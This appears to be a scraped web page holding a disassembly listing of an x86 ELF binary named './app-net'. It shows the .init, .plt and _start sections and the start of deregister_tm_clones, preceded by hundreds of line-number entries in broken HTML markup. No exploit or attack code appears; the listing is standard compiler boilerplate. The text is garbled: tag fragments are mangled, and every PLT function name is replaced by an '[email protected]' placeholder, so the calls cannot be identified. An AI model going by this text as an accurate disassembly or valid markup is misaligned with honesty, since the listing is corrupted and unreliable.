class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/span span class="code-line"span class="normal"192/span/span span class="code-line"span class="normal"193/span/span span class="code-line"span class="normal"194/span/span span class="code-line"span class="normal"195/span/span span class="code-line"span class="normal"196/span/span span class="code-line"span class="normal"197/span/span span class="code-line"span class="normal"198/span/span span class="code-line"span class="normal"199/span/span span class="code-line"span class="normal"200/span/span span class="code-line"span class="normal"201/span/span span class="code-line"span class="normal"202/span/span span class="code-line"span class="normal"203/span/span span class="code-line"span class="normal"204/span/span span class="code-line"span class="normal"205/span/span span class="code-line"span class="normal"206/span/span span class="code-line"span class="normal"207/span/span span class="code-line"span class="normal"208/span/span span class="code-line"span class="normal"209/span/span span class="code-line"span class="normal"210/span/span span class="code-line"span class="normal"211/span/span span class="code-line"span class="normal"212/span/span span class="code-line"span class="normal"213/span/span span class="code-line"span class="normal"214/span/span span class="code-line"span class="normal"215/span/span span class="code-line"span class="normal"216/span/span span class="code-line"span class="normal"217/span/span span class="code-line"span class="normal"218/span/span span class="code-line"span class="normal"219/span/span span class="code-line"span class="normal"220/span/span span class="code-line"span class="normal"221/span/span span class="code-line"span class="normal"222/span/span span class="code-line"span class="normal"223/span/span span class="code-line"span class="normal"224/span/span span class="code-line"span class="normal"225/span/span span class="code-line"span class="normal"226/span/span span class="code-line"span class="normal"227/span/span span class="code-line"span class="normal"228/span/span span class="code-line"span class="normal"229/span/span span class="code-line"span class="normal"230/span/span span class="code-line"span class="normal"231/span/span span class="code-line"span class="normal"232/span/span span class="code-line"span class="normal"233/span/span span class="code-line"span class="normal"234/span/span span class="code-line"span class="normal"235/span/span span class="code-line"span class="normal"236/span/span span class="code-line"span class="normal"237/span/span span class="code-line"span class="normal"238/span/span span class="code-line"span class="normal"239/span/span span class="code-line"span class="normal"240/span/span span class="code-line"span class="normal"241/span/span span class="code-line"span class="normal"242/span/span span class="code-line"span class="normal"243/span/span span class="code-line"span class="normal"244/span/span span class="code-line"span class="normal"245/span/span span class="code-line"span class="normal"246/span/span span class="code-line"span class="normal"247/span/span span class="code-line"span class="normal"248/span/span span class="code-line"span class="normal"249/span/span span class="code-line"span class="normal"250/span/span span class="code-line"span class="normal"251/span/span span class="code-line"span class="normal"252/span/span span class="code-line"span class="normal"253/span/span span class="code-line"span class="normal"254/span/span span class="code-line"span class="normal"255/span/span span class="code-line"span class="normal"256/span/span span class="code-line"span class="normal"257/span/span span class="code-line"span class="normal"258/span/span span class="code-line"span class="normal"259/span/span span class="code-line"span class="normal"260/span/span span class="code-line"span class="normal"261/span/span span class="code-line"span class="normal"262/span/span span class="code-line"span class="normal"263/span/span span class="code-line"span class="normal"264/span/span span class="code-line"span class="normal"265/span/span span class="code-line"span class="normal"266/span/span span class="code-line"span class="normal"267/span/span span class="code-line"span class="normal"268/span/span span class="code-line"span class="normal"269/span/span span class="code-line"span class="normal"270/span/span span class="code-line"span class="normal"271/span/span span class="code-line"span class="normal"272/span/span span class="code-line"span class="normal"273/span/span span class="code-line"span class="normal"274/span/span span class="code-line"span class="normal"275/span/span span class="code-line"span class="normal"276/span/span span class="code-line"span class="normal"277/span/span span class="code-line"span class="normal"278/span/span span class="code-line"span class="normal"279/span/span span class="code-line"span class="normal"280/span/span span class="code-line"span class="normal"281/span/span span class="code-line"span class="normal"282/span/span span class="code-line"span class="normal"283/span/span span class="code-line"span class="normal"284/span/span span class="code-line"span class="normal"285/span/span span class="code-line"span class="normal"286/span/span span class="code-line"span class="normal"287/span/span span class="code-line"span class="normal"288/span/span span class="code-line"span class="normal"289/span/span span class="code-line"span class="normal"290/span/span span class="code-line"span class="normal"291/span/span span class="code-line"span class="normal"292/span/span span class="code-line"span class="normal"293/span/span span class="code-line"span class="normal"294/span/span span class="code-line"span class="normal"295/span/span span class="code-line"span class="normal"296/span/span span class="code-line"span class="normal"297/span/span span class="code-line"span class="normal"298/span/span span class="code-line"span class="normal"299/span/span span class="code-line"span class="normal"300/span/span span class="code-line"span class="normal"301/span/span span class="code-line"span class="normal"302/span/span span class="code-line"span class="normal"303/span/span span class="code-line"span class="normal"304/span/span span class="code-line"span class="normal"305/span/span span class="code-line"span class="normal"306/span/span span class="code-line"span class="normal"307/span/span span class="code-line"span class="normal"308/span/span span class="code-line"span class="normal"309/span/span span class="code-line"span class="normal"310/span/span span class="code-line"span class="normal"311/span/span span class="code-line"span class="normal"312/span/span span class="code-line"span class="normal"313/span/span span class="code-line"span class="normal"314/span/span span class="code-line"span class="normal"315/span/span span class="code-line"span class="normal"316/span/span span class="code-line"span class="normal"317/span/span span class="code-line"span class="normal"318/span/span span class="code-line"span class="normal"319/span/span span class="code-line"span class="normal"320/span/span span class="code-line"span class="normal"321/span/span span class="code-line"span class="normal"322/span/span span class="code-line"span class="normal"323/span/span span class="code-line"span class="normal"324/span/span span class="code-line"span class="normal"325/span/span span class="code-line"span class="normal"326/span/span span class="code-line"span class="normal"327/span/span span class="code-line"span class="normal"328/span/span span class="code-line"span class="normal"329/span/span span class="code-line"span class="normal"330/span/span span class="code-line"span class="normal"331/span/span span class="code-line"span class="normal"332/span/span span class="code-line"span class="normal"333/span/span span class="code-line"span class="normal"334/span/span span class="code-line"span class="normal"335/span/span span class="code-line"span class="normal"336/span/span span class="code-line"span class="normal"337/span/span span class="code-line"span class="normal"338/span/span span class="code-line"span class="normal"339/span/span span class="code-line"span class="normal"340/span/span span class="code-line"span class="normal"341/span/span span class="code-line"span class="normal"342/span/span span class="code-line"span class="normal"343/span/span span class="code-line"span class="normal"344/span/span span class="code-line"span class="normal"345/span/span span class="code-line"span class="normal"346/span/span span class="code-line"span class="normal"347/span/span span class="code-line"span class="normal"348/span/span span class="code-line"span class="normal"349/span/span span class="code-line"span class="normal"350/span/span span class="code-line"span class="normal"351/span/span span class="code-line"span class="normal"352/span/span span class="code-line"span class="normal"353/span/span span class="code-line"span class="normal"354/span/span span class="code-line"span class="normal"355/span/span span class="code-line"span class="normal"356/span/span span class="code-line"span class="normal"357/span/span span class="code-line"span class="normal"358/span/span span class="code-line"span class="normal"359/span/span span class="code-line"span class="normal"360/span/span span class="code-line"span class="normal"361/span/span span class="code-line"span class="normal"362/span/span span class="code-line"span class="normal"363/span/span span class="code-line"span class="normal"364/span/span span class="code-line"span class="normal"365/span/span span class="code-line"span class="normal"366/span/span span class="code-line"span class="normal"367/span/span span class="code-line"span class="normal"368/span/span span class="code-line"span class="normal"369/span/span span class="code-line"span class="normal"370/span/span span class="code-line"span class="normal"371/span/span span class="code-line"span class="normal"372/span/span span class="code-line"span class="normal"373/span/span span class="code-line"span class="normal"374/span/span span class="code-line"span class="normal"375/span/span span class="code-line"span class="normal"376/span/span span class="code-line"span class="normal"377/span/span span class="code-line"span class="normal"378/span/span span class="code-line"span class="normal"379/span/span span class="code-line"span class="normal"380/span/span span class="code-line"span class="normal"381/span/span span class="code-line"span class="normal"382/span/span span class="code-line"span class="normal"383/span/span span class="code-line"span class="normal"384/span/span span class="code-line"span class="normal"385/span/span span class="code-line"span class="normal"386/span/span span class="code-line"span class="normal"387/span/span span class="code-line"span class="normal"388/span/span span class="code-line"span class="normal"389/span/span span class="code-line"span class="normal"390/span/span span class="code-line"span class="normal"391/span/span span class="code-line"span class="normal"392/span/span span class="code-line"span class="normal"393/span/span span class="code-line"span class="normal"394/span/span span class="code-line"span class="normal"395/span/span span class="code-line"span class="normal"396/span/span span class="code-line"span class="normal"397/span/span span class="code-line"span class="normal"398/span/span span class="code-line"span class="normal"399/span/span span class="code-line"span class="normal"400/span/span span class="code-line"span class="normal"401/span/span span class="code-line"span class="normal"402/span/span span class="code-line"span class="normal"403/span/span span class="code-line"span class="normal"404/span/span span class="code-line"span class="normal"405/span/span span class="code-line"span class="normal"406/span/span span class="code-line"span class="normal"407/span/span span class="code-line"span class="normal"408/span/span span class="code-line"span class="normal"409/span/span span class="code-line"span class="normal"410/span/span span class="code-line"span class="normal"411/span/span span class="code-line"span class="normal"412/span/span span class="code-line"span class="normal"413/span/span span class="code-line"span class="normal"414/span/span span class="code-line"span class="normal"415/span/span span class="code-line"span class="normal"416/span/span span class="code-line"span class="normal"417/span/span span class="code-line"span class="normal"418/span/span span class="code-line"span class="normal"419/span/span span class="code-line"span class="normal"420/span/span span class="code-line"span class="normal"421/span/span span class="code-line"span class="normal"422/span/span span class="code-line"span class="normal"423/span/span span class="code-line"span class="normal"424/span/span span class="code-line"span class="normal"425/span/span span class="code-line"span class="normal"426/span/span span class="code-line"span class="normal"427/span/span span class="code-line"span class="normal"428/span/span span class="code-line"span class="normal"429/span/span span class="code-line"span class="normal"430/span/span span class="code-line"span class="normal"431/span/span span class="code-line"span class="normal"432/span/span span class="code-line"span class="normal"433/span/span span class="code-line"span class="normal"434/span/span span class="code-line"span class="normal"435/span/span span class="code-line"span class="normal"436/span/span span class="code-line"span class="normal"437/span/span span class="code-line"span class="normal"438/span/span span class="code-line"span class="normal"439/span/span span class="code-line"span class="normal"440/span/span span class="code-line"span class="normal"441/span/span span class="code-line"span class="normal"442/span/span span class="code-line"span class="normal"443/span/span span class="code-line"span class="normal"444/span/span span class="code-line"span class="normal"445/span/span span class="code-line"span class="normal"446/span/span span class="code-line"span class="normal"447/span/span span class="code-line"span class="normal"448/span/span span class="code-line"span class="normal"449/span/span span class="code-line"span class="normal"450/span/span span class="code-line"span class="normal"451/span/span span class="code-line"span class="normal"452/span/span span class="code-line"span class="normal"453/span/span span class="code-line"span class="normal"454/span/span span class="code-line"span class="normal"455/span/span span class="code-line"span class="normal"456/span/span span class="code-line"span class="normal"457/span/span span class="code-line"span class="normal"458/span/span span class="code-line"span class="normal"459/span/span span class="code-line"span class="normal"460/span/span span class="code-line"span class="normal"461/span/span span class="code-line"span class="normal"462/span/span span class="code-line"span class="normal"463/span/span span class="code-line"span class="normal"464/span/span span class="code-line"span class="normal"465/span/span span class="code-line"span class="normal"466/span/span span class="code-line"span class="normal"467/span/span span class="code-line"span class="normal"468/span/span span class="code-line"span class="normal"469/span/span span class="code-line"span class="normal"470/span/span span class="code-line"span class="normal"471/span/span span class="code-line"span class="normal"472/span/span span class="code-line"span class="normal"473/span/span span class="code-line"span class="normal"474/span/span span class="code-line"span class="normal"475/span/span span class="code-line"span class="normal"476/span/span span class="code-line"span class="normal"477/span/span span class="code-line"span class="normal"478/span/span span class="code-line"span class="normal"479/span/span span class="code-line"span class="normal"480/span/span span class="code-line"span class="normal"481/span/span span class="code-line"span class="normal"482/span/span span class="code-line"span class="normal"483/span/span span class="code-line"span class="normal"484/span/span span class="code-line"span class="normal"485/span/span span class="code-line"span class="normal"486/span/span span class="code-line"span class="normal"487/span/span span class="code-line"span class="normal"488/span/span span class="code-line"span class="normal"489/span/span span class="code-line"span class="normal"490/span/span span class="code-line"span class="normal"491/span/span span class="code-line"span class="normal"492/span/span span class="code-line"span class="normal"493/span/span span class="code-line"span class="normal"494/span/span span class="code-line"span class="normal"495/span/span span class="code-line"span class="normal"496/span/span span class="code-line"span class="normal"497/span/span span class="code-line"span class="normal"498/span/span span class="code-line"span class="normal"499/span/span span class="code-line"span class="normal"500/span/span span class="code-line"span class="normal"501/span/span span class="code-line"span class="normal"502/span/span span class="code-line"span class="normal"503/span/span span class="code-line"span class="normal"504/span/span span class="code-line"span class="normal"505/span/span span class="code-line"span class="normal"506/span/span span class="code-line"span class="normal"507/span/span span class="code-line"span class="normal"508/span/span span class="code-line"span class="normal"509/span/span span class="code-line"span class="normal"510/span/span span class="code-line"span class="normal"511/span/span span class="code-line"span class="normal"512/span/span span class="code-line"span class="normal"513/span/span span class="code-line"span class="normal"514/span/span span class="code-line"span class="normal"515/span/span span class="code-line"span class="normal"516/span/span span class="code-line"span class="normal"517/span/span span class="code-line"span class="normal"518/span/span span class="code-line"span class="normal"519/span/span span class="code-line"span class="normal"520/span/span span class="code-line"span class="normal"521/span/span span class="code-line"span class="normal"522/span/span span class="code-line"span class="normal"523/span/span span class="code-line"span class="normal"524/span/span span class="code-line"span class="normal"525/span/span span class="code-line"span class="normal"526/span/span span class="code-line"span class="normal"527/span/span span class="code-line"span class="normal"528/span/span span class="code-line"span class="normal"529/span/span span class="code-line"span class="normal"530/span/span span class="code-line"span class="normal"531/span/span span class="code-line"span class="normal"532/span/span span class="code-line"span class="normal"533/span/span span class="code-line"span class="normal"534/span/span span class="code-line"span class="normal"535/span/span span class="code-line"span class="normal"536/span/span span class="code-line"span class="normal"537/span/span span class="code-line"span class="normal"538/span/span span class="code-line"span class="normal"539/span/span span class="code-line"span class="normal"540/span/span span class="code-line"span class="normal"541/span/span span class="code-line"span class="normal"542/span/span span class="code-line"span class="normal"543/span/span span class="code-line"span class="normal"544/span/span span class="code-line"span class="normal"545/span/span span class="code-line"span class="normal"546/span/span span class="code-line"span class="normal"547/span/span span class="code-line"span class="normal"548/span/span span class="code-line"span class="normal"549/span/span span class="code-line"span class="normal"550/span/span span class="code-line"span class="normal"551/span/span span class="code-line"span class="normal"552/span/span span class="code-line"span class="normal"553/span/span span class="code-line"span class="normal"554/span/span span class="code-line"span class="normal"555/span/span span class="code-line"span class="normal"556/span/span span class="code-line"span class="normal"557/span/span span class="code-line"span class="normal"558/span/span span class="code-line"span class="normal"559/span/span span class="code-line"span class="normal"560/span/span span class="code-line"span class="normal"561/span/span span class="code-line"span class="normal"562/span/span span class="code-line"span class="normal"563/span/span span class="code-line"span class="normal"564/span/span span class="code-line"span class="normal"565/span/span span class="code-line"span class="normal"566/span/span span class="code-line"span class="normal"567/span/span span class="code-line"span class="normal"568/span/span span class="code-line"span class="normal"569/span/span span class="code-line"span class="normal"570/span/span span class="code-line"span class="normal"571/span/span span class="code-line"span class="normal"572/span/span span class="code-line"span class="normal"573/span/span span class="code-line"span class="normal"574/span/span span class="code-line"span class="normal"575/span/span span class="code-line"span class="normal"576/span/span span class="code-line"span class="normal"577/span/span span class="code-line"span class="normal"578/span/span span class="code-line"span class="normal"579/span/span span class="code-line"span class="normal"580/span/span span class="code-line"span class="normal"581/span/span span class="code-line"span class="normal"582/span/span span class="code-line"span class="normal"583/span/span span class="code-line"span class="normal"584/span/span span class="code-line"span class="normal"585/span/span span class="code-line"span class="normal"586/span/span span class="code-line"span class="normal"587/span/span span class="code-line"span class="normal"588/span/span span class="code-line"span class="normal"589/span/span span class="code-line"span class="normal"590/span/span span class="code-line"span class="normal"591/span/span span class="code-line"span class="normal"592/span/span span class="code-line"span class="normal"593/span/span span class="code-line"span class="normal"594/span/span span class="code-line"span class="normal"595/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nl"./app-net/spanspan class="p":/span file format span class="s"elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".init/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"080485e0/span span class="p"lt;/spanspan class="nf"_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80485e0: 55 push ebp/span/span span class="code-line"span class="x" 80485e1: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80485e3: 53 push ebx/span/span span class="code-line"span class="x" 80485e4: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 80485e7: e8 00 00 00 00 call 80485ec lt;_init+0xcgt;/span/span span class="code-line"span class="x" 80485ec: 5b pop ebx/span/span span class="code-line"span class="x" 80485ed: 81 c3 14 0b 00 00 add ebx,0xb14/span/span span class="code-line"span class="x" 80485f3: 8b 93 fc ff ff ff mov edx,DWORD PTR [ebx-0x4]/span/span span class="code-line"span class="x" 80485f9: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 80485fb: 74 05 je 8048602 lt;_init+0x22gt;/span/span span class="code-line"span class="x" 80485fd: e8 ae 00 00 00 call 80486b0 lt;[email protected];/span/span span class="code-line"span class="x" 8048602: 58 pop eax/span/span span class="code-line"span class="x" 8048603: 5b pop ebx/span/span span class="code-line"span class="x" 8048604: c9 leave /span/span span class="code-line"span class="x" 8048605: c3 ret /span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".plt/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048610/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"-/spanspan class="mh"0x10/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048610: ff 35 04 91 04 08 push DWORD PTR ds:0x8049104/span/span span class="code-line"span class="x" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="x" 804861c: 00 00 add BYTE PTR [eax],al/span/span span class="code-line"span class="x" .../span/span span class="code-line"/span span class="code-line"span class="mh"08048620/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="x" 8048626: 68 00 00 00 00 push 0x0/span/span span class="code-line"span class="x" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048630/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="x" 8048636: 68 08 00 00 00 push 0x8/span/span span class="code-line"span class="x" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048640/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="x" 8048646: 68 10 00 00 00 push 0x10/span/span span class="code-line"span class="x" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048650/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="x" 8048656: 68 18 00 00 00 push 0x18/span/span span class="code-line"span class="x" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048660/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="x" 8048666: 68 20 00 00 00 push 0x20/span/span span class="code-line"span class="x" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048670/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="x" 8048676: 68 28 00 00 00 push 0x28/span/span span class="code-line"span class="x" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048680/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="x" 8048686: 68 30 00 00 00 push 0x30/span/span span class="code-line"span class="x" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048690/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="x" 8048696: 68 38 00 00 00 push 0x38/span/span span class="code-line"span class="x" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486a0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="x" 80486a6: 68 40 00 00 00 push 0x40/span/span span class="code-line"span class="x" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486b0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="x" 80486b6: 68 48 00 00 00 push 0x48/span/span span class="code-line"span class="x" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486c0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="x" 80486c6: 68 50 00 00 00 push 0x50/span/span span class="code-line"span class="x" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486d0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="x" 80486d6: 68 58 00 00 00 push 0x58/span/span span class="code-line"span class="x" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486e0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="x" 80486e6: 68 60 00 00 00 push 0x60/span/span span class="code-line"span class="x" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486f0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="x" 80486f6: 68 68 00 00 00 push 0x68/span/span span class="code-line"span class="x" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048700/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="x" 8048706: 68 70 00 00 00 push 0x70/span/span span class="code-line"span class="x" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048710/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="x" 8048716: 68 78 00 00 00 push 0x78/span/span span class="code-line"span class="x" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048720/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="x" 8048726: 68 80 00 00 00 push 0x80/span/span span class="code-line"span class="x" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048730/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="x" 8048736: 68 88 00 00 00 push 0x88/span/span span class="code-line"span class="x" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048740/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="x" 8048746: 68 90 00 00 00 push 0x90/span/span span class="code-line"span class="x" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048750/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="x" 8048756: 68 98 00 00 00 push 0x98/span/span span class="code-line"span class="x" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048760/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="x" 8048766: 68 a0 00 00 00 push 0xa0/span/span span class="code-line"span class="x" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048770/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="x" 8048776: 68 a8 00 00 00 push 0xa8/span/span span class="code-line"span class="x" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048780/span span class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048780: 31 ed xor ebp,ebp/span/span span class="code-line"span class="x" 8048782: 5e pop esi/span/span span class="code-line"span class="x" 8048783: 89 e1 mov ecx,esp/span/span span class="code-line"span class="x" 8048785: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048788: 50 push eax/span/span span class="code-line"span class="x" 8048789: 54 push esp/span/span span class="code-line"span class="x" 804878a: 52 push edx/span/span span class="code-line"span class="x" 804878b: 68 00 8d 04 08 push 0x8048d00/span/span span class="code-line"span class="x" 8048790: 68 10 8d 04 08 push 0x8048d10/span/span span class="code-line"span class="x" 8048795: 51 push ecx/span/span span class="code-line"span class="x" 8048796: 56 push esi/span/span span class="code-line"span class="x" 8048797: 68 6c 88 04 08 push 0x804886c/span/span span class="code-line"span class="x" 804879c: e8 3f ff ff ff call 80486e0 lt;[email protected];/span/span span class="code-line"span class="x" 80487a1: f4 hlt /span/span span class="code-line"span class="x" 80487a2: 90 nop/span/span span class="code-line"span class="x" 80487a3: 90 nop/span/span span class="code-line"span class="x" 80487a4: 90 nop/span/span span class="code-line"span class="x" 80487a5: 90 nop/span/span span class="code-line"span class="x" 80487a6: 90 nop/span/span span class="code-line"span class="x" 80487a7: 90 nop/span/span span class="code-line"span class="x" 80487a8: 90 nop/span/span span class="code-line"span class="x" 80487a9: 90 nop/span/span span class="code-line"span class="x" 80487aa: 90 nop/span/span span class="code-line"span class="x" 80487ab: 90 nop/span/span span class="code-line"span class="x" 80487ac: 90 nop/span/span span class="code-line"span class="x" 80487ad: 90 nop/span/span span class="code-line"span class="x" 80487ae: 90 nop/span/span span class="code-line"span class="x" 80487af: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"080487b0/span span class="p"lt;/spanspan class="nf"deregister_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487b0: b8 6f 91 04 08 mov eax,0x804916f/span/span span class="code-line"span class="x" 80487b5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ba: 83 f8 06 cmp eax,0x6/span/span span class="code-line"span class="x" 80487bd: 77 02 ja 80487c1 lt;deregister_tm_clones+0x11gt;/span/span span class="code-line"span class="x" 80487bf: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487c1: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 80487c6: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 80487c8: 74 f5 je 80487bf lt;deregister_tm_clones+0xfgt;/span/span span class="code-line"span class="x" 80487ca: 55 push ebp/span/span span class="code-line"span class="x" 80487cb: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80487cd: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 80487d0: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 80487d7: ff d0 call eax/span/span span class="code-line"span class="x" 80487d9: c9 leave /span/span span class="code-line"span class="x" 80487da: c3 ret /span/span span class="code-line"span class="x" 80487db: 90 nop/span/span span 